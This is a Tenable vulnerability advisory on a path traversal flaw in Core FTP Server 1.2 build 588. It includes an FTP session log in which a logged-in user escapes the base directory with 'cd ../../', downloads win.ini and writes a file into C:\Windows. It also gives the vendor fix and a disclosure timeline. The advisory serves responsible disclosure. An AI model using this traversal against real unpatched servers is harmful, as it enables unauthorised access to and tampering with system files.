Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] Core FTP Server Path Traversal Arbitrary File/Directory Access

Medium

Synopsis

Configuration

Core FTP Server 1.2 build 588 (32 bit or 64 bit) released on April 7, 2016 was installed. This finding is based on setting the “domain properties” via the GUI so that the “Base directory” is C:\Users\Public and the authentication method “Enable WinNT users” is checked. The “Enable WinNT” authentication method allows the remote user to log in as one of the existing Windows users. No other major settings have been altered. On the server where Core FTP Server is installed, there is a native Windows administrative user cleverly named “admin” we added.

A Case of Documentation?

The documentation for Core FTP server is fairly minimal, enough to get it configured and working. However, the "Enable WinNT users" functionality (can see the little check box in the second image at http://www.coreftp.com/server/help/Create_Domain.htm) doesn't come with any warning or explanation as to what that means, other than the content of using the native Windows accounts for authentication. Historically, FTP servers set a 'base directory' much like web servers set 'docroot', with the intention of that location being the highest up the directory tree one could access. Historical traversal attacks would bypass that limitation allowing access to files and/or directories on the system. Based on the relevant documentation:

   http://www.coreftp.com/server/help/help_/GettingStarted.htm
   5:  Chose a base directory where all directories and user directories will exist.
   If you are choosing a networked drive, you may need to modify the account in the Core FTP Server's service properties, as the system account may not have access to the network drive.

   http://www.coreftp.com/server/help/Add_account.htm
   As a reminder, if you lock a user in their home directory, they will not be able to access virtual paths.

However, locking a user in the home directory doesn't work with NT Auth. Based on the above, an administrator installing Core FTP may expect that it should limit users to the configured Base Directory and subdirectories only.

Relative Path Traversal

Logging in as "admin" to the target machine when 'Enable WinNT users' is configured, Core FTP Server should probably restrict any user to C:\Users\Public and its subdirectories. However, using a simple traversal (e.g. ../../) via the 'cd' command, an attacker can traverse directories to see “C:\”, download files (e.g. win.ini from C:\Windows), and create files (e.g. “albino_lobster.txt” to C:\Windows):


madagascar:~ tenrec$ ftp [email protected]
Connected to 192.168.1.3.
220-Core FTP Server Version 1.2, build 588, 64-bit, installed 0 days ago Unregistered
220-Hello Friend
220 
331 password required for admin
Password: 
230-Logged on
230 
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (192,168,1,3,237,224).
150 Opening ASCII mode data connection
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Capybara
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Downloads
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Music
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Pictures
dr-xr-xr-x   1 owner    group               0 Nov 21  2010 Recorded TV
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Warez
226 Transfer Complete
ftp> cd ../../
250 CWD command successful
ftp> pwd
Remote directory: /
ftp> ls
227 Entering Passive Mode (192,168,1,3,237,227).
150 Opening ASCII mode data connection
dr-xr-xrwx   1 owner    group               0 Apr  4 12:39 cygwin65
dr-xr-xr-x   1 owner    group               0 Apr 18 10:30 Program Files
dr-xr-xr-x   1 owner    group               0 Apr 18 13:54 Program Files (x86)
dr-xr-xrwx   1 owner    group               0 Apr 18 10:29 Python9000
dr-xr-xr-x   1 owner    group               0 Apr 18 14:59 Users
dr-xr-xrwx   1 owner    group               0 Apr 18 16:58 Windows
226 Transfer Complete
ftp> cd Windows
250 CWD command successful
ftp> get win.ini
local: win.ini remote: win.ini
227 Entering Passive Mode (192,168,1,3,237,248).
150 RETR command started
   403        2.88 MiB/s 
226 Transfer Complete
403 bytes received in 00:00 (1.32 MiB/s)
ftp> put albino_lobster.txt 
local: albino_lobster.txt remote: albino_lobster.txt
227 Entering Passive Mode (192,168,1,3,238,4).
150 STOR command started
100% |********************************************************************************************************|     4        2.00 KiB/s    00:00 ETA
226 Transfer Complete
4 bytes sent in 00:00 (1.52 KiB/s)

Note that if you log in as a non-administrator, you cannot write to C:\Windows.

Solution

Upgrade to Core FTP Server 1.2, build 589 to resolve this issue. Note that the Build 588 forum post was edited by Core FTP to mention 589, thus appearing to be backdated.

Tenable would like to acknowledge not only the quick response time in emails, but the incredibly fast turnaround on providing a new build to resolve this issue. Outstanding work.

Disclosure Timeline

2016-04-18 - Issue discovered
2016-04-29 - Reported to vendor via [email protected]
2016-04-29 - Vendor acks issue, working on patch
2016-04-29 - Vendor replies, Build 589 released to address issue
2016-05-02 - Tenable confirms updated build fixes issue

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2016-13
Credit:
Jacob Baines, Tenable Network Security
CVSSv2 Base / Temporal Score:
5.5 / 4.5
CVSSv2 Vector:
(AV:N/AC:L/Au:S/C:P/I:P/A:N/E:F/RL:OF/RC:C)
Affected Products:
Core FTP Server 1.2, build 588
Risk Factor:
Medium

Advisory Timeline

2016-05-03 - [R1] Initial Release

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training